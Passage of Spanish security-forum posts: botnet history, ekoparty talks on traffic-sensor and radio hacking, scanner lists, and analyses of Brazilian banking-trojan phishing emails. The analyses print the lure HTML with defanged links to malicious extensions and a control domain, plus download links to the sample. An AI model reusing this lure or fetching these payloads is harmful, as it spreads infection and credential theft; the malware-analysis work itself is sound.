Este es el malware más viejo de nuestra lista, y ha sido uno de los primeros en tener éxito usando tácticas que luego serían utilizadas por otras botnets de esta lista. Fue masivo, logrando alcanzar diez millones de computadoras con Windows en su cenit. También fue una de las primeras botnets increíblemente grandes usadas para el rédito económico de sus autores.

El gran tamaño de esta red les permitió fraccionarla para venderla a diferentes partes, con diversos fines maliciosos. Y porque esto resultó un esfuerzo muy lucrativo, los creadores del malware lo diseñaron para que pelee contra los investigadores anti-malware: era capaz de tornar sus fuerzas zombis contra quien intentara unirse a su canal de comando y control, desde donde los autores daban órdenes a los bots, dejando a los investigadores offline y fuera de batalla.

2. Conficker

El malware es difícil de predecir. A veces una amenaza que en la superficie no parece ser particularmente avanzada, puede terminar protagonizando un ataque abrumador. En su apogeo, Conficker infectó millones de máquinas Windows: algunos dicen que el número llegó a 15 millones.

En las películas, cuando una amenaza complica el modo de vida cotidiano, un grupo de especialistas se forma para derrotar al enemigo. Esto no fue diferente: la cantidad de infecciones fue tan grande que se creó el equipo Conficker Working Group para pelear contra él. Y si bien tuvieron un éxito disminuyendo el número de máquinas infectadas, según el sitio del grupo, hay todavía un millón de computadoras aún afectadas en el mundo –seis años después de que fuera descubierto.

3. Zeus

¿Qué tal si la invasion zombie no afectara solo humanos, sino también mascotas y animales de granja? Zeus fue igual de abarcativa: no solo fue una gran botnet en sistemas Windows, tenía también un componente que robaba códigos de banca en línea de una variedad de dispositivos infectados (Symbian, Windows Mobile, Android y Blackberry). En 2012, fuerzas estadounidenses y sus socios de la industria de la tecnología dieron de baja la botnet.

Pero los autores originales tomaron piezas de su creación original y la revivieron –tal como un hechicero vuelve a la vida a un zombi resucitado- y nació lo que conocimos como Gameover Zeus, la cual el FBI dio de baja hace unos meses.

Sin embargo, ese tampoco fue el final de esta bestia informática: sus creadores están rearmando nuevamente su red zombi. ¿Se acuerdan de Cryptolocker, que no nos daba respiro el año pasado? Esta amenaza fue propagada por variantes de Zeus.

4. Flashback

Para aquellos que piensan que "Mac no se infecta con virus", Flashback fue en cierta forma un shock. Lo cierto es que las Macs pueden infectarse con malware –y lo hacen. De hecho, máquinas infectadas se han convertido en parte de esta botnet masiva. Mientras la red Conficker se hizo de un mayor número de máquinas afectadas, Flashback tuvo un gran porcentaje del número total de máquinas Apple, con cerca de 600 mil infectadas en su "mejor" momento.

Hoy la botnet está abandonada, pero contemplando que aún hay computadoras infectadas, ¿quién sabe qué deparará su futuro?

5. Windigo

En la superficie, este bot parece ser como muchos otros: roba credenciales de máquinas infectadas, o usa su poder de procesamiento para enviar spam. Y con solo algunas decenas de miles de máquinas infectadas en su pico, sería difícil equiparar esta amenaza con el resto de las botnets de esta lista.

Sin embargo, los autores de este malware parecen haber creado su propio ejército zombi lentamente, de modo que han logrado permanecer fuera del radar por un tiempo.

Y esas decenas de miles de máquinas son Linux, en su mayoría servidores, y muchos alojan sitios que visitan millones de personas. Windigo no se limita a afectar sistemas Linux: infecta computadoras Windows con malware que se propaga a través de un exploit kit. También "sirve" a los usuarios de Mac con avisos de sitios de citas, y redirige a los de iPhone a sitios pornográficos.

El nombre viene de la leyenda algonquina que habla de un Wendigo asociado al canibalismo –la representación "corporizada" de la gula, la varicia y el exceso. Esta bestia nunca estaba satisfecha matando y consumiendo a una persona; siempre estaba buscando nuevas víctimas.

Muchas de estas amenazas fueron destruidas en algún momento, pero el peligro, en verdad, sigue existiendo en forma de máquinas aun infectadas o proclives a estarlo, que se esconden en las sombras esperando una oportunidad para volver. Estas amenazas afectaron a casi todos los grandes sistemas operativos, lo que nos muestra que no hay dispositivo realmente inmune. Todos necesitan implementar buenas prácticas de seguridad en toda ocasión, con cualquier dispositivo, independientemente del tipo de software que utilice.

Si hacen eso, tienen mejores chances de protegerse no solo a ustedes mismos, sino también a otros, de estas creaciones resurrectas.

Autor Lysa Myers, ESET

#327

Noticias / Ekoparty: “¿Cómo hackear sistemas de control de tráfico en grandes ciudades?”

1 Noviembre 2014, 03:28 AM

Tal como les anticipamos, hoy, en la segunda jornada de presentaciones de la décima edición de ekoparty, fue el turno del argentino César Cerrudo, conocido por haber encontrado la forma de hackear sistemas de control de tráfico de ciudades de Estados Unidos -también utilizados en Francia, Australia, Reino Unido y otros países. Les contaremos los detalles de su investigación, dónde residen las vulnerabilidades y para qué ataques podrían ser utilizadas.

Por empezar, es necesario conocer la infraestructura que se utiliza. En el mundo hay más de 200 mil magnetómetros enterrados en el asfalto, los cuales, cuando un auto pasa por encima, detectan la anomalía y el movimiento. Su batería dura 10 años, por lo que requieren poco mantenimiento; cuentan con una mini computadora y un chip procesador para la transmisión inalámbrica en 2.4 gigahercios. Estos sensores se conectan a la red interna del sistema de control de tráfico por GSM o ethernet.

Una interfaz que va en las cabinas junto a los semáforos traduce los datos para mandarlos al sistema, y hay repetidores que extienden el rango de la señal.
¿Cómo trabajan?

Los sensores, entonces, están en la calle con los repetidores y el access point (AP). Pensemos un posible uso: en una esquina, detectarán si hay autos esperando y qué tan larga es la fila; recolectarán información para mandarla al AP, que la reenvía a un semáforo o a distintos sistemas para control de tráfico. De esta forma, según la configuración que se use, se buscará hacer más inteligentes a los semáforos, por ejemplo, si se necesita que haya una onda verde para descongestionar el flujo de tráfico. En otras palabras, si hay un auto trabado, el sistema será capaz de tomar una decisión como dar luz verde para que pueda avanzar.

También pueden calcular la velocidad de circulación, ya que saben en tiempo real, en base a distintos cálculos, cuánto le llevó a un determinado auto recorrer determinada distancia.

En cuanto a software, corren con uno para Windows hecho en Flash/ActionScript para configurar access points, repetidores y sensores, y mandarles comandos.
¿Cuáles son las vulnerabilidades encontradas?

Por empezar, el sistema no tiene cifrado, lo que significa que todos los datos viajan en texto plano. Esto permite que cualquier atacante pueda interceptar las comunicaciones, y ver lo que se está transmitiendo.

Al respecto, el fabricante ha dicho: "Las transmisiones de radio no llevan comandos, sino datos, por lo que no hay riesgo". La respuesta a la ausencia de cifrado fue que como a los clientes no les había gustado, decidieron desestimarlo, y que como el sistema estaba diseñado para funcionar sin cifrado, no había riesgo en términos de seguridad. Además, argumentaron, como el protocolo es propietario, está "libre de hackers" porque solo ellos lo conocen. ¡Error!

Pero, tal como expuso César Cerrudo, hay algunas falencias:

El sistema no tiene autenticación en las comunicaciones: el AP confía ciegamente en que los datos vienen de los sensores, por lo que si alguien manda información falsa, la va a tomar como verdadera. De igual forma, los sensores siempre creen que los comandos vienen del AP.
El firmaware del sensor no tiene cifrado ni firma digital, por lo cual cualquiera puede actualizarlo, modificarlo e insertarle un virus o un backdoor, por ejemplo.

¿Qué problemas podría causar?

Si estos ataques se hicieran a gran escala, los efectos serían masivos ya que en el mundo hay más de 200 mil sensores que funcionan con estas características, que equivalen a cien millones de dólares en equipos. Básicamente, una consecuencia sería netamente económica en este sentido, por las pérdidas que pudiera ocasionar, y por otro lado, habría consecuencias a nivel físico si hablamos del funcionamiento cotidiano de los sistemas de tráfico.

Pensemos en los embotellamientos en zonas neurálgicas, desvíos, accesos y rampas que se podrían ocasionar -y también, en los accidentes. Además, exceso de tiempo con luz verde o, por el contrario, todo luz roja ocasionando demoras y bloqueando ambulancias, bomberos o policía; o que se muestre un límite de velocidad erróneo, entre otras posibilidades.

César nombró el caso de Los Angeles, donde hubo dos días de atascamiento porque se alteró el tráfico de una intersección neurálgica. Él usaba su computadora en la calle apuntando a los sensores usando el software del fabricante, y comprobó que cualquier AP sirve para acceder a cualquier sensor del mundo.

El siguiente video de IOActive muestra detalles de la utilización de estos sistemas en grandes ciudades:

[youtube=640,360]http://www.youtube.com/watch?v=RviQ3YQTxMo [/youtube]

¿Qué ataques se podrían hacer?

Naturalmente, un ataque de Denegación de Servicio (DoS) sería viable; es posible acceder a los sensores y mandar datos falsos, deshabilitar sensores o repetidores y demás. Por otro lado, las nuevas implementaciones de estos sistemas son fáciles de localizar, porque el fabricante hace publicaciones y anuncios de prensa sobre nuevos clientes, nuevas instalaciones y demás. De igual forma, los dispositivos son fácilmente localizables en todo el mundo mediante Google Street View, que permite obtener sus coordenadas.

También es posible lanzar el ataque usando GPS (cuando detecte unas coordenadas específicas), y desde la altura con drones, utilizando una antena. Para que los ataques sean efectivos, se debe estar a un máximo de 300 metros y utilizar una antena para amplificar el alcance.

La demostración en vivo de César constató que desde un AP con el software del fabricante, podía indicar la (falsa) existencia de sensores que en verdad no existen y eran inventados en el momento. Mandando datos falsos de detección desde una distancia de 20 metros, se veía cómo el software detectaba todo en tiempo real.

César también mencionó la posibilidad de hacer un gusano que se propague a través de la actualización de firmware, de forma que si se le inserta malware, se replicará: si se infecta un sensor, luego se infectan todos. Como agravante, se puede engañar al sistema de forma que nadie pueda saber si ese firmware fue alterado.

Por último, ataques más avanzados y difíciles, prácticamente imposibles hoy en día, serían a través de la localización de personas en tiempo real, comprometiendo sus smartphones. Si recolectando información en redes sociales sobre dónde está o qué está haciendo una persona, el atacante sabe qué controles de tráfico tiene cerca y por lo tanto puede comprometerlos y así, hacer "ataques dirigidos" pero a nivel físico.

¿Qué les parece todo esto? ¿Creían posible hackear sistemas de control de tráfico? No se pierdan los contenidos que seguiremos publicando como parte nuestra cobertura especial de ekoparty desde We Live Security en Español.

Fuente: http://www.welivesecurity.com

#328

Noticias / Explotación práctica de señales de radio con Software Defined Radio

1 Noviembre 2014, 03:18 AM

Continuamos cubriendo la ekoparty y esta vez fue el turno de Luis Colunga, investigador y representante de la firma Websec, con su presentación sobre explotación práctica de señales de radio, utilizando la tecnología SDR –del inglés, Software Defined Radio, con la que ha estado experimentando los últimos tres años.

Software Defined Radio consiste en el reemplazo de componentes físicos usualmente utilizados en comunicaciones inalámbricas por su equivalente en software. Esto ofrece la posibilidad de mantener desarrollos sin la necesidad de hardware específico, facilitando el rediseño, la reparación de bugs y la nueva puesta en producción de sistemas, reduciendo conjuntamente los costos de despliegue.

Esta tecnología, usualmente utilizada bajo un enfoque académico para la realización de investigaciones basadas sobre medios inalámbricos, puede encontrar nuevos usos al permitir la recepción de señales de radio, emitidas por automóviles, aviones, barcos e incluso satélites, de manera sencilla y económicamente rentable.

En este contexto, la creciente importancia de SDR como herramienta de seguridad se refleja en sus ventajas al momento de fortalecer los protocolos de telecomunicaciones inalámbricas y métodos de autenticación que en ellas se presentan, entendiendo los posibles ataques que pueden ser llevados a cabo e incluyéndolos en el repertorio de pruebas en procesos de pentesting.

Las plataformas disponibles al momento de realizar SDR varían en múltiples factores, como ser rangos de frecuencia, ancho de banda, interfaces disponibles, capacidad de recepción/transmisión, o precisión del oscilador, utilizando equipos de recepción y transmisión de señales, o mediante análisis de ondas con procesadores exclusivos que permiten el ahorro en costo de procesamiento.

Algunos equipos utilizados en la presentación incluyen RTL-SDR, un equipo que cuesta unos 20 dólares, inicialmente pensado para la recepción de señales de televisión digital cuya utilización devino en la posibilidad de trabajar con transmisiones Wi-Fi mediante el desarrollo de un driver especializado. Otro desarrollo es HackRF, que permite transmisiones dúplex, la sintonización de toda la banda FM con un ancho de banda de 20 Mhz y un costo aproximado de unos 300 dólares.

De esta manera, mediante la utilización de equipos de muy bajo costo, es posible la recepción de tráfico GSM, y su consiguiente análisis y codificación, con el objeto de explotar protocolos inalámbricos para obtener el tiempo de llegada de aviones, su velocidad, su identificador, y la consecuente ubicación geográfica en base al procesamiento de la señal. Aún más, es factible la irrupción en el tráfico aéreo para crear aviones fantasmas, lo que representa una seria amenaza para la gestión del tráfico aéreo, mediante como presentó Colunga durante el evento.

Asimismo, es posible perpetrar ataques mediante captura, procesamiento y retransmisión de señales inalámbricas producidas por automóviles, irrumpir señales de televisión digital, tomar control de dispositivos industriales, o aprovecharnos de la falta de cifrado y autenticación en las comunicaciones satelitales, receptando y almacenando múltiples señales al mismo tiempo.

La utilización de SDR fue vedada en el pasado debido a su alto costo y desarrollo inmaduro. Sin embargo, con el paso del tiempo y el paulatino aumento del conocimiento de los protocolos y tecnologías disponibles, se ha reducido su coste promedio desde unos 5000 dólares en 2010, a unos 20 dólares en la actualidad; y de esta forma es mucho más sencillo llevar su aplicación a prácticas de seguridad rutinarias.

Como bien recordó el orador en su charla, vale recordar que muchas de estas prácticas son ilegales y peligrosas ya que implican irrumpir en comunicaciones que, a pesar de no estar debidamente protegidas, está vetado por ley (en muchos países) el acceso y, fumdamentalmente, un error cometido en el análisis podría llegar a causar incluso un accidente.

Fuente: http://www.welivesecurity.com

#329

Seguridad / Servicios online para analizar el pc, páginas web y archivos

1 Noviembre 2014, 01:12 AM

Servicios online para analizar el pc, páginas web y archivos:

Servicos para analizar online tu pc en busca de malware:

http://quickscan.bitdefender.com/es/

http://home.mcafee.com/downloads/free-virus-scan

http://www.eset.com/int/online-scanner-popup/

http://housecall.trendmicro.com/es/#_ga=1.245948429.802419634.1414790729

http://www.f-secure.com/en/web/labs_global/tools-beta

http://www.free.kaspersky.com/?n=1263926817518&ClickID=dnk0yzmbwktbhxczshhxzxnrztnhttmcyywy

http://latam.kaspersky.com/productos/antivirus-online-gratis

http://www.microsoft.com/security/scanner/es-xl/default.aspx

https://www.arcabit.pl/skaner_online

https://security.symantec.com/nss/getnss.aspx?/WelcomePage.asp

Servicios que analizan páginas web, ejecutables, apk, js, pdf, flash:

https://anubis.iseclab.org/ # Analiza links, ejecutables y archivos APK de android.

https://www.virustotal.com/es/ # Analiza links, ejecutables y archivos APK de android

http://wepawet.cs.ucsb.edu/ o https://wepawet.iseclab.org/ # Analiza links, ejecutables y archivos javascript, pdf y flash.

Servicios para analizar archivos ejecutables:

http://virusscan.jotti.org/en

http://www.threatexpert.com/filescan.aspx

http://eureka.cyber-ta.org/

http://camas.comodo.com/cgi-bin/submit

https://valkyrie.comodo.com/

https://threatcenter.crdf.fr/?Sandbox

https://www.metascan-online.com/en

https://analysis.f-secure.com/portal/login.html

http://www.xandora.net/upload/

http://www.virscan.org/

http://ether.gtisc.gatech.edu/web_unpack/

http://www.suspectfile.com/index.php

http://www.file-analyzer.net/

https://www.microsoft.com/security/portal/submission/submit.aspx

https://cloud.votiro.com/

http://es.clamwin.com/content/view/89/85/

http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx

http://www.fortiguard.com/antivirus/virus_scanner.html

http://online.us.drweb.com/

Servicios que analizan páginas web:

http://www.urlvoid.com/

http://zulu.zscaler.com/

https://asafaweb.com/

http://app.webinspector.com/

http://www.avgthreatlabs.com/website-safety-reports/

http://safeweb.norton.com/

http://onlinelinkscan.com/

http://urlquery.net/

https://www.phishtank.com/

http://sitecheck.sucuri.net/

http://quttera.com/

http://vms.drweb.com/online/

http://online.drweb.com/?url=1

Servicios para descifrar archivos:

http://dean.edwards.name/unpacker/ (Also available as .NET, perl and PHP applications.)

http://www.toolsvoid.com/html-encode # HTML Decode

http://www.toolsvoid.com/reverse-string # String Reverse

http://www.toolsvoid.com/base64decode # Base64 Decode

http://www.toolsvoid.com/urldecode # URL Decode / Unescape

http://www.toolsvoid.com/httpheaders # Inspect HTTP Headers

http://www.tareeinternet.com/scripts/unescape.html # Descifra javascript

http://ostermiller.org/calc/encode.html # Encode/Decode URL, Base64 y Hex

http://jsunpack.jeek.org/ # PDF, pcap, html y javascript

http://www.greymagic.com/security/tools/decoder/ # Script Decoder

http://meyerweb.com/eric/tools/dencoder/ # URL Decoder/Encoder

http://ddecode.com/hexdecoder/ # HTML/Oct/Hex Decoder

http://www.tareeinternet.com/scripts/unescape.html # Unescape Decoder and Encoder

http://encoders-decoders.online-domain-tools.com/ # xml, base64, y más.

http://www.minelinks.com/supercode/2cryptoolE.html

http://www.minelinks.com/supercode/jscrypt.html

Servicios para análisis de dominios (whois):

http://whois.domaintools.com/

http://www.whois.net/

https://www.cdmon.com/cas/dominios/whois/

http://www.ip-adress.com/whois/

Servicios para analizar documentos (pdf, doc, docx, etc):

http://malwaretracker.com/pdf.php

http://www.malwaretracker.com/doc.php

http://www.document-analyzer.net/

https://cloud.votiro.com/

http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx

Servicios para analizar las url acortadas (bit.ly,etc):

http://longurl.org/

http://knowurl.com/

Servicios para analizar archivos de android APK:

http://www.apk-analyzer.net/

Servicios varios:

Servicio creado por FireEye para descifrar los archivos modificados por CryptoLocker:

https://www.decryptcryptolocker.com/

Servicio Online creado por AlienVault donde examinarán via log tu tráfico de red:

- Web: https://www.alienvault.com/open-threat-exchange/reputation-monitor

* Necesitaras de Login para hacer uso del servicio:

https://www.alienvault.com/my-account/signup?CTA=OTX

Verifica si tu sitio web ha sido vulnerado:

http://www.unmaskparasites.com/

Analiza los metadatos de tus documentos:

https://metashieldanalyzer.elevenpaths.com/#analizeButton

https://www.metascan-online.com/

http://regex.info/exif.cgi

Analiza archivos Thumbs.db:

http://www.informatica64.com/thumbando/

Análisis Log's Hijackthis:

http://www.hijackthis.de/

Imagenes ISO (Disco de rescate): (Elimina malware antes del inicio del sistema)

Panda Safe CD: http://www.pandasecurity.com/resources/tools/SafeCD.iso

FSecure Rescue Disk: http://www.f-secure.com/linux-weblog/files/f-secure-rescue-cd-3.11.23804.zip

BitDefender Rescue CD: http://download.bitdefender.com/rescue_cd/bitdefender-rescue-cd.iso

Kaspersky Rescue Disk: http://rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso

DrWeb Live CD: http://www.freedrweb.com/livedisk

Antivir Rescue System: http://dlpro.antivir.com/package/rescue_system/common/en/rescue_system-common-en.iso

AVG Recue CD: http://www.avg.com/us-en/download-file-cd-arl-iso

Panda Cloud Cleaner: http://acs.pandasoftware.com/pandacloudcleaner/rescuedisk/PandaCloudCleanerFull.iso
http://acs.pandasoftware.com/pandacloudcleaner/rescuedisk/PandaCloudCleanerUSB.exe (para USB)

Se irán añadiendo más servicios que haya olvidado...

Saludos.

Actualizado: 12.12.2014

#330

Seguridad / Servicios VPN gratuitos (Windows, Mac, Mobile)

17 Octubre 2014, 01:39 AM

Comentar que en la mayoría de servicios se requiere de registro de datos...

Wiki: http://es.wikipedia.org/wiki/Red_privada_virtual

CitarUna red privada virtual, RPV o VPN de las siglas en inglés de Virtual Private Network, es una tecnología de red que permite una extensión segura de la red local (LAN) sobre una red pública o no controlada como Internet. Permite que la computadora en la red envíe y reciba datos sobre redes compartidas o públicas como si fuera una red privada con toda la funcionalidad, seguridad y políticas de gestión de una red privada.1 Esto se realiza estableciendo una conexión virtual punto a punto mediante el uso de conexiones dedicadas, cifrado o la combinación de ambos métodos.

#331

Noticias / Cajeros automáticos infectados regalan millones de dólares sin tarjetas de crédi

7 Octubre 2014, 20:59 PM

[youtube=640,360]https://www.youtube.com/watch?v=QZvdPM_h2o8&feature=youtu.be[/youtube]

Fuente: http://www.kaspersky.com/about/news/virus/2014/Infected-ATMs-give-away-millions-of-dollars-without-credit-cards-around-the-globe

#332

Análisis y Diseño de Malware / Trojan Banker - Segue em anexo a 2 via do boleto, Dpto Juridico.

30 Septiembre 2014, 23:37 PM

Código fuente del mensaje recibido:

Código [Seleccionar]

Source:
x-store-info:4r51+eLowCe79NzwdU2kRwMf1FfZT+JrOrNqUS7nEGb27WyWDr7OJIxM0/W6OFf7u/luuGOYHbJldrqaw7hjArci/+7PnaiUt1GYT0o94FwoX2U9VuS+OZ/tzwamW3DXyb0HNhWfLe4=
Authentication-Results: hotmail.com; spf=fail (sender IP is 50.116.33.183; identity alignment result is fail and alignment mode is relaxed) smtp.mailfrom=www-data@uol.com.br; dkim=none (identity alignment result is pass and alignment mode is relaxed) header.d=hotmail.com; x-hmca=none header.id=mixelyx@hotmail.com
X-SID-PRA: mixelyx@hotmail.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTkwsv9Zisdxe0OuIg2e9Xe3+nPJERnQMhzmYY2w30rOUADLyhfuKR0VAaHUpByYtQLqMSnQ5cvatKmlMNBa08gleb5J4UwfwM+ovq0PfAyv3mz88ptSD0ilrCaCqbPo0o3ZNeCNF7ifkeTaGhV0pjHHB9a/uoMOHlOZRQxSQN11TsGCL4xbkYs7HGuVKA4O9XNoGdRoUSK0o1ZJ3ttMjIvd
Received: from uol.com.br ([50.116.33.183]) by BAY004-MC2F29.hotmail.com with Microsoft SMTPSVC(7.5.7601.22712);
         Tue, 23 Sep 2014 01:53:39 -0700
Received: by uol.com.br (Postfix, from userid 33)
        id 6A09161439; Tue, 23 Sep 2014 07:33:35 +0000 (UTC)
To: xxxxx@hotmail.com
Subject: Segue em anexo a 2 via do boleto, Dpto Juridico.
X-PHP-Originating-Script: 0:index.php
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: Juridico <mixelyx@hotmail.com>
Message-Id: <20140923073335.6A09161439@uol.com.br>
Date: Tue, 23 Sep 2014 07:33:35 +0000 (UTC)
Return-Path: www-data@uol.com.br
X-OriginalArrivalTime: 23 Sep 2014 08:53:39.0464 (UTC) FILETIME=[DE80F880:01CFD70B]
 
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <meta content="text/html; charset=ISO-8859-1"
 http-equiv="content-type">
  <title></title>
</head>
<body>
<a href="hxtps://storage.googleapis.com/visualizaoronlines/documento.html"><img
 style="border: 0px solid ; width: 971px; height: 648px;"
 src="hxtp://gsete.com/osticket/js/emiss.png"
 alt="Para ver o anexo clique aqui"></a>
<p><img src="hxtp://bit.ly/XZrR6u" width="1" height="1" /></p>
</body>
</html>

Aquí tenemos el archivo:

hxtps://storage.googleapis.com/visualizaoronlines/documento.html

VT: https://www.virustotal.com/es/url/b237e77608d997a5f4d036e39f87c473379436332ab8eeb7b74677e90b47a1fc/analysis/1412065188/ --> 0 / 59
AI: https://anubis.iseclab.org/?action=result&task_id=1aeb136b9180b69e47900b7de352b3a03

Aqui el análisis del archivo content.js:
VT: https://www.virustotal.com/es/file/94244ae5709a34df53ab8e1160be3dbeb8970805da2ddb652bf3a7e76744a12b/analysis/1412057891/
SHA256: 94244ae5709a34df53ab8e1160be3dbeb8970805da2ddb652bf3a7e76744a12b

Nombre: content.js
Detecciones: 2 / 55
Fecha de análisis: 2014-09-30 06:18:11 UTC ( hace 0 minutos )

instal.rdf:

Código [Seleccionar]


File: install.rdf
MD5:  b39f4830a0e4e05367e585209fbcc71b
Size: 1080

Ascii Strings:
---------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?><!-- This Source Code Form is subject to the terms of the Mozilla Public
   - License, v. 2.0. If a copy of the MPL was not distributed with this
   - file, You can obtain one at http://mozilla.org/MPL/2.0/. --><RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>jid1-Sqj4NY0VG6TS9g@jetpack</em:id>
    <em:version>0.1</em:version>
    <em:type>2</em:type>
    <em:bootstrap>true</em:bootstrap>
    <em:unpack>false</em:unpack>
    <!-- Firefox -->
    <em:targetApplication>
      <Description>
        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
        <em:minVersion>21.0</em:minVersion>
        <em:maxVersion>29.0a1</em:maxVersion>
      </Description>
    </em:targetApplication>
    <!-- Front End MetaData -->
    <em:name>Visualizador Documentos</em:name>
    <em:description>a basic add-on</em:description>
    <em:creator></em:creator>
    
    
    
  </Description>
</RDF>

Versiones afectadas para firefox:

Citar<em:minVersion>21.0</em:minVersion>
<em:maxVersion>29.0a1</em:maxVersion>

harness-options.json:

Código [Seleccionar]


hxtp://lucasdasilvaregere.biz/


view-source:http://lucasdasilvaregere.biz/:

<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js" ></script>

  <link id="css-3373342544" class="www-core" rel="stylesheet" href="https://s.ytimg.com/yts/cssbin/www-core-webp-vflhcl-Ef.css" data-loaded="true">


      <link id="css-2187159078" class="www-player" rel="stylesheet" href="https://s.ytimg.com/yts/cssbin/www-player-webp-vfl3CEEFK.css" data-loaded="true">

Descarga del plugin para chrome y firefox (extraido del código fuente):

Firefox: hxtps://storage.googleapis.com/visualizaoronlines/VisualizadorDocumentos.xpi
Chrome: hxtps://chrome.google.com/webstore/detail/visualizador-online/ncmmgnoahjmpdboogfafhhaipgejaebl
Datos:
[Versión: 0.0.13
Última actualización: 22 de septiembre de 2014
Tamaño: 68.01KB
Idioma: português (Brasil)]

Upssss cuanta gente: Accesibilidad [1.000 usuarios] "Good Botnet...."

Para abrir los archivos con extensión .xpi para Firefox pueden usar cualquier extractor, sea UniExtract, IZArc, winrar....

Otros datos:

http://whois.domaintools.com/lucasdasilvaregere.biz
[Proxied by AnonymousBitcoinDomains.com]

Información sobre los archivos con extensión .webp qie interpreta Chrome:

https://developers.google.com/speed/webp/
http://es.wikipedia.org/wiki/WebP
http://www.fileinfo.com/extension/webp

Quien quiera echarle un ojo lo he subido a dos servidores:

Descarga: http://www.mediafire.com/download/ua1tyyjby03y8h2/VisualizadorDocumentos.zip
https://mega.co.nz/#!54ZhXRIT!zdvp1ssnsf-ad8QFAZCIHjc27H_F6X6grVlX0MXUgCo
Pass: infected

Contenido del archivo comprimido:

Espero no haber olvidado nada, cualquier cosa lo añado.

Saludos.

#333

Seguridad / Servicio online para verificar si tu cuenta de gmail está entre las robadas

27 Septiembre 2014, 01:04 AM

En este servicio se nos dirá si nuestra cuenta de gmail está entre las 5 millones de cuentas que se filtraron en el último ataque:

xhttps://isleaked.com/sa (De momento, comprobaré)

Alternativa:

http://tecnologia.elpais.com/tecnologia/2014/09/10/actualidad/1410370277_060781.html#sumario_2|include

Saludos.

#334

Noticias / Piratear antenas de telefonía móvil ¿el próximo gran objetivo de los hackers?

27 Septiembre 2014, 00:56 AM

No vi la noticia posteada por el foro, me resultó curiosa, se ve que china es moda ya

http://www.adslzone.net/2014/09/18/piratear-antenas-de-telefonia-movil-el-proximo-gran-objetivo-de-los-hackers/

La noticia es de hace 10 dia, pero me resultó interesante.

Saludos

LEER: https://foro.elhacker.net/noticias/piratear_antenas_de_telefonia_movil_iquestel_proximo_gran_objetivo_de_los_hackers-t421408.0.html

#335

GNU/Linux / Qubes OS (R2 rc2) Sistema operativo virtualizado

23 Septiembre 2014, 21:41 PM

Bueno no se si comenté sobre esto, creo que si pero no encuentro el tema, llevo usandolo desde su lanzamiento y no he tenido problemas todavía, basado en Xen "by Rafal Wojtczuk and Joanna Rutkowska"

Link: https://qubes-os.org/
Screen: https://qubes-os.org/wiki/QubesScreenshots
Descarga: https://qubes-os.org/wiki/QubesDownloads
Guía de instalación: https://qubes-os.org/wiki/InstallationGuideR2rc2
Source: http://git.qubes-os.org/
Xen: http://es.wikipedia.org/wiki/Xen

Joanna_Rutkowska: http://es.wikipedia.org/wiki/Joanna_Rutkowska

Más información: http://www.invisiblethingslab.com/resources/2014/Software_compartmentalization_vs_physical_separation.pdf

Necesitareis virtualización si no no os aceptará la instalación. Puedes comprobarlo en tu BIOS.

Algunos tutoriales interesantes de verdaderos informaticos (NO H4X0R -.-):

http://www.invisiblethingslab.com/itl/Resources.html

Saludos

#336

Análisis y Diseño de Malware / BoletoSetembro.cpl

2 Septiembre 2014, 20:07 PM

Este mensaje lo recibí ayer, me resultó curioso y saqué algo de info, aunque de momento solo estático.

Aquí el código del mensaje de hotmail:

Código [Seleccionar]

x-store-info:4r51+eLowCe79NzwdU2kRwMf1FfZT+JrOrNqUS7nEGaWI7+e07AEo5CA6K8iX7qtKtPv721BY5mo0WEcsdQP8XzOoWHLaYmOuMSRVnhqmiCChEz1ym6wxKg9LOLCqjdzXXpVvv2L+c8=
Authentication-Results: hotmail.com
; spf=fail (sender IP is 50.116.38.78;
identity alignment result is fail and alignment mode is relaxed)
smtp.mailfrom=www-data@uol.com.br; dkim=none (identity alignment result is
pass and alignment mode is relaxed) header.d=hotmail.com
; x-hmca=none
header.id
 
=mixelyx@hotmail.com X-SID-PRA: mixelyx@hotmail.com X-AUTH-Result:
NONE X-SID-Result: NONE X-Message-Status: n:n X-Message-Delivery:
Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02 X-Message-Info:
11chDOWqoTkwsv9Zisdxe0OuIg2e9Xe3+nPJERnQMhzmYY2w30rOUOVECewZibIxiC+Sp79a25TZ8EgdIr1PuKws638wpvvvqx+tQVRiOWS+BlpxQzg0Pla7ooiSB0teFiOpsoADfWGBa6fUznD7FENT6zo2DX3s5DqTQFcmRvssVEAUj+Dna6uAOBGAvm76Bn7hNIBcWaFtIbo+nQTkYPe0nrJZqeZw
Received: from uol.com.br
([50.116.38.78]) by BAY004-MC5F24.hotmail.com
 
with Microsoft SMTPSVC(7.5.7601.22712); Mon, 1 Sep 2014 21:57:04 -0700
Received: by uol.com.br
(Postfix, from userid 33) id 724011483F; Tue, 2 Sep
2014 04:57:04 +0000 (UTC) To: xxxxxxx@hotmail.com Subject: Segue em
anexo boleto referente ao mes de Setembro X-PHP-Originating-Script:
0:top01.php MIME-Version: 1.0 Content-type: text/html; charset=iso-8859-1
From: Financeiro <[color=#FF0000]mixelyx@hotmail.com[/color]> Message-Id: <
20140902045704.724011483F@uol.com.br> Date: Tue, 2 Sep 2014 04:57:04 +0000
(UTC) Return-Path: www-data@uol.com.br X-OriginalArrivalTime: 02 Sep 2014
04:57:04.0984 (UTC) FILETIME=[57427580:01CFC66A] <!DOCTYPE html PUBLIC
"-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta
content="text/html; charset=ISO-8859-1" http-equiv="content-type">
<title></title> </head> <body> <a href="
hxtp://bukhamees.com/highslide/graphics/cav.php
 
"><img style="border: 0px
solid ; width: 957px; height: 561px;" src="
hxtp://apmcity.com/css/visixaia.png
 
" alt=""></a> <p><img src="
